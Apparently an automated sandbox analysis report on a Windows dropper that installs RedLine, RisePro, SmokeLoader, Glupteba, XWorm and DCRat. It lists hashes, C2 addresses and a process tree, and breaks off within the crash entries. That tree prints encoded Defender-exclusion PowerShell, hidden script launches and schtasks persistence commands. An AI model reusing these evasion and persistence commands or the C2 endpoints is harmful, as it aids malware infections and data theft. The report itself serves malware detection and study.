dcrat | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Analysis

max time kernel
11s
max time network
151s
platform
windows10-1703_x64
resource
win10-20231220-en
resource tags

arch:x64arch:x86image:win10-20231220-enlocale:en-usos:windows10-1703-x64system
submitted
29-01-2024 12:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Score

10^/10

dcrat glupteba redline risepro smokeloader xworm @pixelscloud lab backdoor dropper evasion infostealer loader rat stealer trojan upx

Malware Config

Extracted

Family

redline

Botnet

@PixelsCloud

94.156.67.230:13781

Extracted

Family

smokeloader

Botnet

lab

Extracted

Family

risepro

193.233.132.62:50500

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
C:\Windows\System32\Bypass.exe	family_xworm

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/424-1188-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral2/memory/5060-1183-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Process spawned unexpected child process 17 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6992	4084	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6532	4084	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	824	4084	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7144	4084	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5296	4084	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2424	4084	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6904	4084	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5244	4084	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6164	4084	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5460	4084	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4780	4084	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6516	4084	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5284	4084	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1784	4084	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7096	4084	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1108	4084	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4108	4084	schtasks.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2708-9-0x0000000000400000-0x0000000000454000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\Files\sadsadsadsa.exe	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\odt\ApplicationFrameHost.exe	dcrat

Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

5196 netsh.exe
5852 netsh.exe
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

pid	process
5196	netsh.exe
5852	netsh.exe

.NET Reactor proctector 5 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral2/memory/68-45-0x0000000004C30000-0x0000000004CC2000-memory.dmp	net_reactor
behavioral2/memory/1460-67-0x00000000007C0000-0x0000000000800000-memory.dmp	net_reactor
behavioral2/memory/1460-66-0x00000000007C0000-0x0000000000800000-memory.dmp	net_reactor
behavioral2/memory/68-46-0x0000000004B10000-0x0000000004BA0000-memory.dmp	net_reactor
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe	net_reactor

Executes dropped EXE 8 IoCs

Processes:

sadsadsadsa.exeCheat.exeCheat.tmpsc.exeaoiido.exepinf.exebrg.exeTemp3.exe

pid process

2708 sadsadsadsa.exe
4064 Cheat.exe
3684 Cheat.tmp
356 sc.exe
68 aoiido.exe
1020 pinf.exe
5040 brg.exe
4752 Temp3.exe

pid	process
2708	sadsadsadsa.exe
4064	Cheat.exe
3684	Cheat.tmp
356	sc.exe
68	aoiido.exe
1020	pinf.exe
5040	brg.exe
4752	Temp3.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\LljM0vX9AQyXiZhg9yD0OWIb.exe	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

26 bitbucket.org
98 pastebin.com
99 pastebin.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

96 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

aoiido.exe

description pid process target process

PID 68 set thread context of 1460 68 aoiido.exe RegAsm.exe
Launches sc.exe 12 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1388 sc.exe
1268 sc.exe
3316 sc.exe
412 sc.exe
356 sc.exe
5508 sc.exe
5332 sc.exe
2824 sc.exe
6996 sc.exe
5688 sc.exe
6120 sc.exe
3916 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
26	bitbucket.org
98	pastebin.com
99	pastebin.com

flow	ioc
96	ip-api.com

description	pid	process	target process
PID 68 set thread context of 1460	68	aoiido.exe	RegAsm.exe

pid	process
1388	sc.exe
1268	sc.exe
3316	sc.exe
412	sc.exe
356	sc.exe
5508	sc.exe
5332	sc.exe
2824	sc.exe
6996	sc.exe
5688	sc.exe
6120	sc.exe
3916	sc.exe

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4228	1460	WerFault.exe	RegAsm.exe
2592	5040	WerFault.exe	brg.exe
952	5060	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
952	424	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
5172	5060	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
5260	424	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
5288	5060	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
5392	424	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
5560	5060	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
5640	424	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
5712	5060	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
5764	424	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
5844	5060	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
5956	5060	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
6004	424	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
5948	424	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
6072	424	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
6080	5060	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
6136	424	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
6120	5060	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
3744	424	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
5232	5060	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
5260	5060	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
5368	5060	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
5436	424	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
5472	424	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
5612	424	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
5676	424	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
5668	5060	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
5400	5060	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
5572	424	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
5552	5060	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
5320	5060	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
5412	5060	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
5344	424	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
5264	424	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
5228	424	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
5144	5060	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
5920	5060	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
5904	424	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
3108	5900	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
5996	5900	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
5872	5900	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
6052	3268	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
6024	5900	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
2140	3268	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
5684	5900	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
5700	3268	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
5376	5900	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
5852	3268	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
5776	3268	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
5196	5900	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
6032	3268	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
6020	5900	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
412	3268	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
5712	5900	WerFault.exe	qE1Ygage53DPAdzJY2vlUD3M.exe
5832	3268	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
1508	3268	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
6572	7004	WerFault.exe	svchost.exe
1784	3268	WerFault.exe	Rgl0Xw9uw8Qq3MVEIzAckRBx.exe
6856	5144	WerFault.exe	csrss.exe
1688	5144	WerFault.exe	csrss.exe
5064	5144	WerFault.exe	csrss.exe
6876	5144	WerFault.exe	csrss.exe

NSIS installer 2 IoCs

installer

Processes:

resource	yara_rule
C:\Program Files (x86)\ClocX\uninst.exe	nsis_installer_1
C:\Program Files (x86)\ClocX\uninst.exe	nsis_installer_2

Creates scheduled task(s) 1 TTPs 25 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
5244	schtasks.exe
4780	schtasks.exe
6516	schtasks.exe
5060	schtasks.exe
4780	schtasks.exe
3532	schtasks.exe
7144	schtasks.exe
1784	schtasks.exe
6532	schtasks.exe
6164	schtasks.exe
5460	schtasks.exe
7096	schtasks.exe
4380	schtasks.exe
824	schtasks.exe
5284	schtasks.exe
1868	schtasks.exe
5296	schtasks.exe
2424	schtasks.exe
3928	schtasks.exe
4108	schtasks.exe
4404	schtasks.exe
1108	schtasks.exe
5612	schtasks.exe
6992	schtasks.exe
6904	schtasks.exe

Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

5152 timeout.exe
2840 timeout.exe
3476 timeout.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

5180 WMIC.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

6228 PING.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

sc.exe

pid process

356 sc.exe
356 sc.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

4363463463464363463463463.exeTemp3.exe

description pid process

Token: SeDebugPrivilege 3008 4363463463464363463463463.exe
Token: SeDebugPrivilege 4752 Temp3.exe

pid	process
5152	timeout.exe
2840	timeout.exe
3476	timeout.exe

pid	process
5180	WMIC.exe

pid	process
6228	PING.EXE

pid	process
356	sc.exe
356	sc.exe

description	pid	process
Token: SeDebugPrivilege	3008	4363463463464363463463463.exe
Token: SeDebugPrivilege	4752	Temp3.exe

Suspicious use of WriteProcessMemory 34 IoCs

Processes:

4363463463464363463463463.exeCheat.exesc.exeaoiido.exe

description	pid	process	target process
PID 3008 wrote to memory of 2708	3008	4363463463464363463463463.exe	sadsadsadsa.exe
PID 3008 wrote to memory of 2708	3008	4363463463464363463463463.exe	sadsadsadsa.exe
PID 3008 wrote to memory of 2708	3008	4363463463464363463463463.exe	sadsadsadsa.exe
PID 3008 wrote to memory of 4064	3008	4363463463464363463463463.exe	Cheat.exe
PID 3008 wrote to memory of 4064	3008	4363463463464363463463463.exe	Cheat.exe
PID 3008 wrote to memory of 4064	3008	4363463463464363463463463.exe	Cheat.exe
PID 4064 wrote to memory of 3684	4064	Cheat.exe	Cheat.tmp
PID 4064 wrote to memory of 3684	4064	Cheat.exe	Cheat.tmp
PID 4064 wrote to memory of 3684	4064	Cheat.exe	Cheat.tmp
PID 3008 wrote to memory of 356	3008	4363463463464363463463463.exe	sc.exe
PID 3008 wrote to memory of 356	3008	4363463463464363463463463.exe	sc.exe
PID 356 wrote to memory of 3928	356	sc.exe	Conhost.exe
PID 356 wrote to memory of 3928	356	sc.exe	Conhost.exe
PID 356 wrote to memory of 3928	356	sc.exe	Conhost.exe
PID 3008 wrote to memory of 68	3008	4363463463464363463463463.exe	aoiido.exe
PID 3008 wrote to memory of 68	3008	4363463463464363463463463.exe	aoiido.exe
PID 3008 wrote to memory of 68	3008	4363463463464363463463463.exe	aoiido.exe
PID 68 wrote to memory of 1460	68	aoiido.exe	RegAsm.exe
PID 68 wrote to memory of 1460	68	aoiido.exe	RegAsm.exe
PID 68 wrote to memory of 1460	68	aoiido.exe	RegAsm.exe
PID 68 wrote to memory of 1460	68	aoiido.exe	RegAsm.exe
PID 68 wrote to memory of 1460	68	aoiido.exe	RegAsm.exe
PID 68 wrote to memory of 1460	68	aoiido.exe	RegAsm.exe
PID 68 wrote to memory of 1460	68	aoiido.exe	RegAsm.exe
PID 68 wrote to memory of 1460	68	aoiido.exe	RegAsm.exe
PID 68 wrote to memory of 1460	68	aoiido.exe	RegAsm.exe
PID 3008 wrote to memory of 1020	3008	4363463463464363463463463.exe	pinf.exe
PID 3008 wrote to memory of 1020	3008	4363463463464363463463463.exe	pinf.exe
PID 3008 wrote to memory of 1020	3008	4363463463464363463463463.exe	pinf.exe
PID 3008 wrote to memory of 5040	3008	4363463463464363463463463.exe	brg.exe
PID 3008 wrote to memory of 5040	3008	4363463463464363463463463.exe	brg.exe
PID 3008 wrote to memory of 5040	3008	4363463463464363463463463.exe	brg.exe
PID 3008 wrote to memory of 4752	3008	4363463463464363463463463.exe	Temp3.exe
PID 3008 wrote to memory of 4752	3008	4363463463464363463463463.exe	Temp3.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

952 attrib.exe

pid	process
952	attrib.exe

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3008

C:\Users\Admin\AppData\Local\Temp\Files\sadsadsadsa.exe
"C:\Users\Admin\AppData\Local\Temp\Files\sadsadsadsa.exe"
2⤵
- Executes dropped EXE
PID:2708

C:\Users\Admin\AppData\Local\Temp\Files\Cheat.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Cheat.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4064

C:\Users\Admin\AppData\Local\Temp\is-01F1F.tmp\Cheat.tmp
"C:\Users\Admin\AppData\Local\Temp\is-01F1F.tmp\Cheat.tmp" /SL5="$C0074,30157316,832512,C:\Users\Admin\AppData\Local\Temp\Files\Cheat.exe"
3⤵
- Executes dropped EXE
PID:3684

C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
"C:\Users\Admin\AppData\Local\Temp\Files\sc.exe"
2⤵
- Executes dropped EXE
- Launches sc.exe
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
3⤵
PID:3928

C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
4⤵
- Launches sc.exe
PID:5508

C:\Users\Admin\AppData\Local\Temp\Files\pinf.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pinf.exe"
2⤵
- Executes dropped EXE
PID:1020

C:\Users\Admin\AppData\Local\Temp\Files\brg.exe
"C:\Users\Admin\AppData\Local\Temp\Files\brg.exe"
2⤵
- Executes dropped EXE
PID:5040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 536
3⤵
- Program crash
PID:2592

C:\Users\Admin\AppData\Local\Temp\Files\aoiido.exe
"C:\Users\Admin\AppData\Local\Temp\Files\aoiido.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:68

C:\Users\Admin\AppData\Local\Temp\Files\Temp3.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Temp3.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4752

C:\Windows\SysWOW64\SubDir\Windows Security Client.exe
"C:\Windows\SysWOW64\SubDir\Windows Security Client.exe"
3⤵
PID:3408

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Update" /sc ONLOGON /tr "C:\Windows\SysWOW64\SubDir\Windows Security Client.exe" /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:4404

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Update" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\Temp3.exe" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:1868

C:\Users\Admin\AppData\Local\Temp\Files\PCSupport.exe
"C:\Users\Admin\AppData\Local\Temp\Files\PCSupport.exe"
2⤵
PID:432

C:\Users\Admin\AppData\Local\PhantomSoft\Support\winvnc.exe
C:\Users\Admin\AppData\Local\PhantomSoft\Support\winvnc.exe
3⤵
PID:1744

C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"
2⤵
PID:2384

C:\Users\Admin\AppData\Local\Temp\Files\socks5-clean.exe
"C:\Users\Admin\AppData\Local\Temp\Files\socks5-clean.exe"
2⤵
PID:364

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypass -File socks5-clean.ps1
3⤵
PID:5112

C:\Users\Admin\AppData\Local\Temp\Files\PrivateCheatFortnite.exe
"C:\Users\Admin\AppData\Local\Temp\Files\PrivateCheatFortnite.exe"
2⤵
PID:4708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
3⤵
PID:700

C:\Windows\system32\mode.com
mode 65,10
4⤵
PID:2268

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
4⤵
PID:1556

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
4⤵
PID:4472

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
4⤵
PID:4380

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
4⤵
PID:4664

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
4⤵
PID:4788

C:\Users\Admin\AppData\Local\Temp\main\kgS98SZkX47b.exe
"kgS98SZkX47b.exe"
4⤵
PID:1288

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
5⤵
PID:1676

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjADUAZQBjADkARQBDAG8ANgBzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbwBiADUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMASAB2AHUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQA5ADMAagBEAFcAOAAwAEwAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
6⤵
PID:6048

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjADUAZQBjADkARQBDAG8ANgBzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbwBiADUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMASAB2AHUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQA5ADMAagBEAFcAOAAwAEwAIwA+AA=="
7⤵
PID:6780

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9331" /TR "C:\ProgramData\Dllhost\dllhost.exe"
6⤵
PID:6316

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
6⤵
PID:6324

C:\Windows\system32\attrib.exe
attrib +H "kgS98SZkX47b.exe"
4⤵
- Views/modifies file attributes
PID:952

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
4⤵
PID:3848

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
4⤵
PID:5060

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_8.zip -oextracted
4⤵
PID:2684

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_9.zip -oextracted
4⤵
PID:3880

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24491142128658189021059222993 -oextracted
4⤵
PID:1192

C:\Users\Admin\AppData\Local\Temp\Files\07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe
"C:\Users\Admin\AppData\Local\Temp\Files\07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe"
2⤵
PID:4848

C:\Users\Admin\AppData\Local\Temp\Files\07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe
"C:\Users\Admin\AppData\Local\Temp\Files\07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe"
3⤵
PID:3888

C:\Users\Admin\AppData\Local\Temp\Files\Installsetup2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Installsetup2.exe"
2⤵
PID:3300

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
3⤵
PID:2432

C:\Users\Admin\Pictures\QAQ05XNFxT8ilijtkT7TKJVu.exe
"C:\Users\Admin\Pictures\QAQ05XNFxT8ilijtkT7TKJVu.exe"
4⤵
PID:2556

C:\Users\Admin\AppData\Local\Temp\is-9RTCD.tmp\QAQ05XNFxT8ilijtkT7TKJVu.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9RTCD.tmp\QAQ05XNFxT8ilijtkT7TKJVu.tmp" /SL5="$8003A,7936204,54272,C:\Users\Admin\Pictures\QAQ05XNFxT8ilijtkT7TKJVu.exe"
5⤵
PID:312

C:\Users\Admin\Pictures\qE1Ygage53DPAdzJY2vlUD3M.exe
"C:\Users\Admin\Pictures\qE1Ygage53DPAdzJY2vlUD3M.exe"
4⤵
PID:5060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 388
5⤵
- Program crash
PID:952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 368
5⤵
- Program crash
PID:5172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 440
5⤵
- Program crash
PID:5288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 684
5⤵
- Program crash
PID:5560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 728
5⤵
- Program crash
PID:5712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 808
5⤵
- Program crash
PID:5844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 372
5⤵
- Program crash
PID:5956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 836
5⤵
- Program crash
PID:6080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 384
5⤵
- Program crash
PID:6120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 728
5⤵
- Program crash
PID:5232

C:\Windows\SysWOW64\WerFault.exe
